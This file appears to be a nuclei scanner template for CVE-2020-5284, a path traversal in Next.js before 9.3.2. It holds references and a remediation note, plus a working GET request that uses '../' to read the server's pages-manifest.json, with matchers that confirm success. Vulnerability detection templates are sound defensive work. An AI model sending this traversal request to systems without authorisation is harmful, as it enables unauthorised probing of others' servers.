nuclei-templates/http/cves/2020/CVE-2020-5284.yaml

43 lines
1.4 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-5284
2020-04-05 18:24:33 +00:00
info:
name: Next.js <9.3.2 - Local File Inclusion
2021-06-09 12:20:56 +00:00
author: rootxharsh,iamnoooob,dwisiswant0
2020-04-05 18:24:33 +00:00
severity: medium
description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.
2021-03-21 06:41:45 +00:00
reference:
- https://github.com/zeit/next.js/releases/tag/v9.3.2
- https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
- https://nvd.nist.gov/vuln/detail/CVE-2020-5284
remediation: This issue is fixed in version 9.3.2.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2020-5284
cwe-id: CWE-22
cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
epss-score: 0.00122
tags: cve,cve2020,nextjs,lfi
metadata:
max-request: 1
2020-04-05 18:24:33 +00:00
http:
2020-04-05 18:24:33 +00:00
- method: GET
path:
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
2020-07-08 08:45:18 +00:00
matchers-condition: and
2020-04-05 18:24:33 +00:00
matchers:
- type: regex
regex:
- '\{"/_app":".*?_app\.js"'
part: body
- type: word
words:
- "application/json"
part: header
2020-04-05 18:24:33 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22